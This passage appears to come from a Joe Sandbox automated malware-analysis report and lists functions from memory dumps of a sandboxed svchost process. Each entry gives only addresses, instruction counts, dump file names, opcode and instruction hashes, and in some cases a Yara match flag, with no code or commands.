                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: a348b358dc08d9d8c7de24184ab9d6e1d3c38354b5f8742a355c3e05f5e97f6b
                                                                                            • Instruction ID: 297e22d965ddef2e6cdf14a63723d190725b401a867a90b1fb916ccdd228f55d
                                                                                            • Opcode Fuzzy Hash: a348b358dc08d9d8c7de24184ab9d6e1d3c38354b5f8742a355c3e05f5e97f6b
                                                                                            • Instruction Fuzzy Hash: 9331A176E00215EFDB19DF98CD80BAEB7B9EB48740F49416AF500AB254D774ED01CB94
                                                                                            Function 03A29730 Relevance: .1, Instructions: 96COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 0ccdc5aa702bdf0825e4e9bad97c5211f6034481d7c483179a266647fb8e7703
                                                                                            • Instruction ID: af420130cf843bbcfcf03bbe6508a1615216b530627310d86487e7881dd52406
                                                                                            • Opcode Fuzzy Hash: 0ccdc5aa702bdf0825e4e9bad97c5211f6034481d7c483179a266647fb8e7703
                                                                                            • Instruction Fuzzy Hash: E421C17AA00B20AFC321EF58C500B1BBFB5FB85B54F15046EE9699B740D770E811CBA0
                                                                                            Function 03AF6BD7 Relevance: .1, Instructions: 96COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: c8d9305d39b6f576c26170394a0df4607d0ef141741020f24c5b9962ed265b3d
                                                                                            • Instruction ID: 441ad80234f9b85874db4fddd785552d8e70c6a0a34f7ed4df09092a6c3b1ad2
                                                                                            • Opcode Fuzzy Hash: c8d9305d39b6f576c26170394a0df4607d0ef141741020f24c5b9962ed265b3d
                                                                                            • Instruction Fuzzy Hash: 39316D316002049FCB24DF6AD9C5A5B7BF4FF49344F8585AAF908DF249D270E945CBA4
                                                                                            Function 03AF60B8 Relevance: .1, Instructions: 95COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: bd8fefc32f358eee74250669a6c2a53541df8e2ff009ff38f824f3f7a0eb921c
                                                                                            • Instruction ID: 5d4d80e6c21f5fba64785222863cb5c12074057b723899b21c9226861e9434ac
                                                                                            • Opcode Fuzzy Hash: bd8fefc32f358eee74250669a6c2a53541df8e2ff009ff38f824f3f7a0eb921c
                                                                                            • Instruction Fuzzy Hash: 2B31E235B00215AFDB22EBA9CD40B6EBBB9AB84354F0445BAF645DB361DA30DD008B94
                                                                                            Function 03A307AF Relevance: .1, Instructions: 95COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: e5d71fa833a8d1c85d93ce40ea508961437422530057e66c6a80456ce13a7350
                                                                                            • Instruction ID: 5136f9f8b664ba176c1beb75b89ca9d0b0bdac83ff35c779946e7b4587a3bd15
                                                                                            • Opcode Fuzzy Hash: e5d71fa833a8d1c85d93ce40ea508961437422530057e66c6a80456ce13a7350
                                                                                            • Instruction Fuzzy Hash: DE31A076A04751DBC711EF28C980E6BBBA5EF86760F05496BFC569B310DA30DC1187E1
                                                                                            Function 0042ED83 Relevance: .1, Instructions: 93COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343330383.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: c8f87b7f006b1d8b0538ad710463dcb5b91f1b0d37d44c62599d5ed22c55d120
                                                                                            • Instruction ID: 02666cb92a6a0255eadff15ccb448de357b998be517c71c70f61df0405b196e7
                                                                                            • Opcode Fuzzy Hash: c8f87b7f006b1d8b0538ad710463dcb5b91f1b0d37d44c62599d5ed22c55d120
                                                                                            • Instruction Fuzzy Hash: F231E372B106265BD354CE3AD880656F7E1FB88350B54873AD918C3B80E774F961CBD4
                                                                                            Function 03A2D6AA Relevance: .1, Instructions: 93COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 759af7da7484718429cce7f3e89ec17e8e493d8f66f8a62f4e587b70ab487789
                                                                                            • Instruction ID: eb43a35771edbffaabd0076309aedc849f8faa4c50c487ebd9d563ab6e2ac006
                                                                                            • Opcode Fuzzy Hash: 759af7da7484718429cce7f3e89ec17e8e493d8f66f8a62f4e587b70ab487789
                                                                                            • Instruction Fuzzy Hash: 1931E336A00A24AFDB21DF5CC980B2ABBB9DB81710F1D846FED259B242D338DD40CB50
                                                                                            Function 004031C0 Relevance: .1, Instructions: 92COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343330383.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 927c130d5b78b3f57ddfb031e9c971aa3cebb46ba5355814f99ba86216a0421c
                                                                                            • Instruction ID: 583ad629750762b5c366185a1c3f0ed5bfa97c64a47d18887e6c4106169a741c
                                                                                            • Opcode Fuzzy Hash: 927c130d5b78b3f57ddfb031e9c971aa3cebb46ba5355814f99ba86216a0421c
                                                                                            • Instruction Fuzzy Hash: 1B319F72A14A148FD378CE6DD841253B7E9AB8C340B418B3EE85AD7790DB78F9058BC4
                                                                                            Function 03A357C0 Relevance: .1, Instructions: 92COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 3f857d78d7158342fd077451c557b50127f55c0307c9fc97317628e47e034ca1
                                                                                            • Instruction ID: 70ea2c1dc56c1e3ad4a3de7320778ec72efa835459b3db9d7361008fcc8a7484
                                                                                            • Opcode Fuzzy Hash: 3f857d78d7158342fd077451c557b50127f55c0307c9fc97317628e47e034ca1
                                                                                            • Instruction Fuzzy Hash: 66318339B15A05FFDB51DB24DA40A59BBA5FF46354F4490ABE9018BB50D731E831CBC0
                                                                                            Function 03A6A6C7 Relevance: .1, Instructions: 92COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                                                            • Instruction ID: 44fd35d0e12f29d0f4970963481795f8dd9f28c962e129b4cbbeb5da9d8c92c8
                                                                                            • Opcode Fuzzy Hash: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                                                            • Instruction Fuzzy Hash: 033128B2B00B00AFD760CF69DE41B57B7F8AB09A50F08092EA59AD3650E730E900CB64
                                                                                            Function 03A5438F Relevance: .1, Instructions: 89COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 663a37088795cf2c3b3e837922d66265ba1aeb4edf4038e2b67683f210b208fc
                                                                                            • Instruction ID: 9c84c3cef76a2a9b52a5f8459333ef394efc3a95333ed19f0e86abd975400cbe
                                                                                            • Opcode Fuzzy Hash: 663a37088795cf2c3b3e837922d66265ba1aeb4edf4038e2b67683f210b208fc
                                                                                            • Instruction Fuzzy Hash: 8D31D631B403059FDB24EFA9C980B6FB7F9AB98305F00852BE945E7654D770E985CB50
                                                                                            Function 03A392C5 Relevance: .1, Instructions: 89COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 2963604b138b45d82781e0a3e479f75d70978de019cd50ff7a7906112cbdd64f
                                                                                            • Instruction ID: 41f29a22330a59c21a04975728f2cca3478fb6dcd4e2fe8ab7c2f222da2ba32f
                                                                                            • Opcode Fuzzy Hash: 2963604b138b45d82781e0a3e479f75d70978de019cd50ff7a7906112cbdd64f
                                                                                            • Instruction Fuzzy Hash: 3E316BB56083499FCB01DF18D980A5ABBE9EF89350F04096EF9519B3A1D734DC14CBA2
                                                                                            Function 03A87190 Relevance: .1, Instructions: 89COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 3d9f232daa6456112ef7cca9ac13d1ecc1d2608bc40d33be58fee952b0e99bbe
                                                                                            • Instruction ID: 8496094d4679e3b686f4be02aba5f420f422d013868d0591c44310e954c57651
                                                                                            • Opcode Fuzzy Hash: 3d9f232daa6456112ef7cca9ac13d1ecc1d2608bc40d33be58fee952b0e99bbe
                                                                                            • Instruction Fuzzy Hash: 65318A75604206CFC710DF18C480956FBF5FF89350B2986AEE9589B325EB31ED46CB91
                                                                                            Function 03AEC3CD Relevance: .1, Instructions: 88COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                                                            • Instruction ID: b3f6e7d3d8c8a3883213dff33af035c1f032d0e2f1a715ff1d47f1c30f62f4ac
                                                                                            • Opcode Fuzzy Hash: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                                                            • Instruction Fuzzy Hash: C3210B3F600755A6CB14EBA58D44ABBF7B4EF50620F40841BFD668B792E634D950C360
                                                                                            Function 03A2C156 Relevance: .1, Instructions: 88COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 10441682143ff2e10de1f0fbafad119bfaf6e13f04ad73d989a75c3fd091e69e
                                                                                            • Instruction ID: 63f5049d048da65b0ce98542e13307ed5445b2d683e46318757187c724efc1c0
                                                                                            • Opcode Fuzzy Hash: 10441682143ff2e10de1f0fbafad119bfaf6e13f04ad73d989a75c3fd091e69e
                                                                                            • Instruction Fuzzy Hash: CB31E8755003108BCB31FF28CD41BA9B7B4AF41314F5885AEE8459F3C1DA78D985CB90
                                                                                            Function 03A2E388 Relevance: .1, Instructions: 86COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                                                            • Instruction ID: 6be498ffc77f99da7f20357187ce17bdcc4030ce99e742110f029f2edc085d95
                                                                                            • Opcode Fuzzy Hash: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                                                            • Instruction Fuzzy Hash: B6319835600614EFDB25DF68C984F6ABBB9EF84354F1449AAE5128B790E730EE42CB50
                                                                                            Function 03B003E6 Relevance: .1, Instructions: 86COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: ca4fc2d2057f2b721026d9e3821c641e589cdf5e38f45c9aa7b9859f06b89267
                                                                                            • Instruction ID: 842f19eb48e24731352997c2f9350ca748b29e7c628d8a17d6c6e99c31b900b6
                                                                                            • Opcode Fuzzy Hash: ca4fc2d2057f2b721026d9e3821c641e589cdf5e38f45c9aa7b9859f06b89267
                                                                                            • Instruction Fuzzy Hash: A1316671B00115AFCB14EBA5D994F9FBBB9FF88208F414179E905E7240DB306E04CB94
                                                                                            Function 03AAE609 Relevance: .1, Instructions: 86COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: fe0e0c0a6e68b9f076e0073759958ebc725c619241f1a18fd81638372ad471a7
                                                                                            • Instruction ID: 5414556288cea4aca77af54bd0584462f8baaf486434672ffbac3bb4c914b861
                                                                                            • Opcode Fuzzy Hash: fe0e0c0a6e68b9f076e0073759958ebc725c619241f1a18fd81638372ad471a7
                                                                                            • Instruction Fuzzy Hash: 3231A076A00605DFCB14CF1CC884EAEB7B6FF88304B15495AF8099B390E775EA41CB90
                                                                                            Function 03B00591 Relevance: .1, Instructions: 84COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 3f996f56f7e18af1709c04f8104eed9d81abd0e8ce6b4e7374b6f01a7499018d
                                                                                            • Instruction ID: 9b92ea5652eec92414f08be214399c4127a8bee0d9253d5814bdf9d0c5776272
                                                                                            • Opcode Fuzzy Hash: 3f996f56f7e18af1709c04f8104eed9d81abd0e8ce6b4e7374b6f01a7499018d
                                                                                            • Instruction Fuzzy Hash: 6721F3326002058FD728DE29C880BBABBA6EFD4308F5945B8E905CB2C5D730F845C750
                                                                                            Function 03A5F32A Relevance: .1, Instructions: 79COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: e1acee25a86a18db778833508db53c8429f7f2c8d9f42c0ea70f9f679245ea3d
                                                                                            • Instruction ID: 776df0fbfa74df8bb085ee9a9a24d65ac25c63c8521db731e0b29bba83dc814f
                                                                                            • Opcode Fuzzy Hash: e1acee25a86a18db778833508db53c8429f7f2c8d9f42c0ea70f9f679245ea3d
                                                                                            • Instruction Fuzzy Hash: 37219D72200300DFD719DF15C545B6ABBF9EFA5365F15816EE91A8B3A0EBB0E801CB94
                                                                                            Function 03AB06F1 Relevance: .1, Instructions: 79COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 505861c4915b04f2863257ddab4115b3c054bc400dc3252a8b1146e6799410e6
                                                                                            • Instruction ID: 35dabd07cad794f77d1305b6b6fb5542d963e8ac63f654862c33f5943f086e1e
                                                                                            • Opcode Fuzzy Hash: 505861c4915b04f2863257ddab4115b3c054bc400dc3252a8b1146e6799410e6
                                                                                            • Instruction Fuzzy Hash: 06218D75A00629ABCF20DF59C981ABFF7F8FF49740B54006AE541AB241D778AD52CBA0
                                                                                            Function 03AB019F Relevance: .1, Instructions: 78COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 4394f00247f787b554161ca54f03d8e85f3f4b4577b6125826e06ed32b0efdf6
                                                                                            • Instruction ID: ead4f6dccd50184d9fe44f6895c31d9cb99c59526c4c7772cf63b4d90afd4fc4
                                                                                            • Opcode Fuzzy Hash: 4394f00247f787b554161ca54f03d8e85f3f4b4577b6125826e06ed32b0efdf6
                                                                                            • Instruction Fuzzy Hash: F721BC75600604AFCB15DB68D980F6AB7B8FF88740F14016AF944DB7A1D738ED50CBA8
                                                                                            Function 03AB0283 Relevance: .1, Instructions: 74COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 5d0e53e777885b1d2ca7fde7633ab3e0860f28b5d5fb482448331dac3c712cfe
                                                                                            • Instruction ID: 02ab7f6b5abb7ad43a892a62fba816729fb9701e8973191bc19f537efc0a1226
                                                                                            • Opcode Fuzzy Hash: 5d0e53e777885b1d2ca7fde7633ab3e0860f28b5d5fb482448331dac3c712cfe
                                                                                            • Instruction Fuzzy Hash: 0721B0729043459BC711EF69C948BABF7FCBF81240F08455BBD80CB292D734D948C6A2
                                                                                            Function 03AD71F9 Relevance: .1, Instructions: 74COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 4f9a7c00cc92fa43c14c654dfc1b8f7e6e7d7632cc008b57d54ee1a349aeecc7
                                                                                            • Instruction ID: c8cc6152edefe1855bd3dbef3f5c3104ed435eac425c76c8f4c07d1921548f1b
                                                                                            • Opcode Fuzzy Hash: 4f9a7c00cc92fa43c14c654dfc1b8f7e6e7d7632cc008b57d54ee1a349aeecc7
                                                                                            • Instruction Fuzzy Hash: 34212831A047908FC32CDF658940B2BB7E9EFC1314F14496FF8A787250CB71A9858791
                                                                                            Function 03AAD0C0 Relevance: .1, Instructions: 73COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: a31c2c23b4517fa83190f2f071b075dcb825627450a6f94414447da29f9bb9ec
                                                                                            • Instruction ID: c699146f45b4bb1a427ab309b04656c33923b4e7aedf325ee4dc2aa737b0d378
                                                                                            • Opcode Fuzzy Hash: a31c2c23b4517fa83190f2f071b075dcb825627450a6f94414447da29f9bb9ec
                                                                                            • Instruction Fuzzy Hash: 8321B072644B00ABD311DF1CCC51B5BBBB4EB89720F04052FF9859B7A0D730D90187A9
                                                                                            Function 03B001AA Relevance: .1, Instructions: 71COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: a7e7540d6b35ae0773defcbfdf58532279f93a25ff1c4da5357d5f6d1b62e69a
                                                                                            • Instruction ID: 2f69d4ba6420ce59ad5e1e369c31798c21275ad31b46d0ff109f90485169308d
                                                                                            • Opcode Fuzzy Hash: a7e7540d6b35ae0773defcbfdf58532279f93a25ff1c4da5357d5f6d1b62e69a
                                                                                            • Instruction Fuzzy Hash: 4D21E4612042504FE745CB1A88B44B6BFE5EFD6229B0982E6D8C4CB346C135D907C7B0
                                                                                            Function 03A6A30B Relevance: .1, Instructions: 70COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 70d0f84faab431c625d840ca31eed989c339b15e834d3396036205dd3872479d
                                                                                            • Instruction ID: fcda52dc117d75957cee4c037bd19ced99529df4bbe9c78f20a5036528925e5d
                                                                                            • Opcode Fuzzy Hash: 70d0f84faab431c625d840ca31eed989c339b15e834d3396036205dd3872479d
                                                                                            • Instruction Fuzzy Hash: FC217F7A200B119FC725DF29C901B56B7F5AF48704F1884AAA519DBB61E371E842CF94
                                                                                            Function 03AC80A8 Relevance: .1, Instructions: 69COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                                                                            • Instruction ID: 77636b453e6f7fce229158d08308e3613bf8e139e9214749da7fbd0edabf01df
                                                                                            • Opcode Fuzzy Hash: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                                                                            • Instruction Fuzzy Hash: D9216A76A00249AFDF12DF98CC40BAEBBF9FF88310F20485AF900A7250D778D9508B50
                                                                                            Function 03A2B765 Relevance: .1, Instructions: 69COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 92d2e8cde5494efff6856a8dc7afe75558ac7ffe81cf384827968c51bb13822e
                                                                                            • Instruction ID: 7538c14602a77caacf4f70c10952b4d8e2efa8e27f4860091f3245760eb7770d
                                                                                            • Opcode Fuzzy Hash: 92d2e8cde5494efff6856a8dc7afe75558ac7ffe81cf384827968c51bb13822e
                                                                                            • Instruction Fuzzy Hash: FB217C36100710DFC722EF58CA40F59BBF5FF58708F144A6EE0099BAA1C774A814CB54
                                                                                            Function 03AFEE26 Relevance: .1, Instructions: 69COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 83e7f85f329b29a41cb252c81359b82f58bd3a56d5b9d7ec1fa6edebf5d7e441
                                                                                            • Instruction ID: c4ee327196b94553d2f41869df296122e72dcebac36540ffd61e9e0161498653
                                                                                            • Opcode Fuzzy Hash: 83e7f85f329b29a41cb252c81359b82f58bd3a56d5b9d7ec1fa6edebf5d7e441
                                                                                            • Instruction Fuzzy Hash: 1A21B433A104119F9B18CF7DD804866F7E6EFDC31436A427AE512DB668D770BD118A84
                                                                                            Function 03A60124 Relevance: .1, Instructions: 68COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                                                            • Instruction ID: adacb8655243f9cb1b2ea92db64297e0e72e7cfcc3f8a09e5bb704af25cef6d6
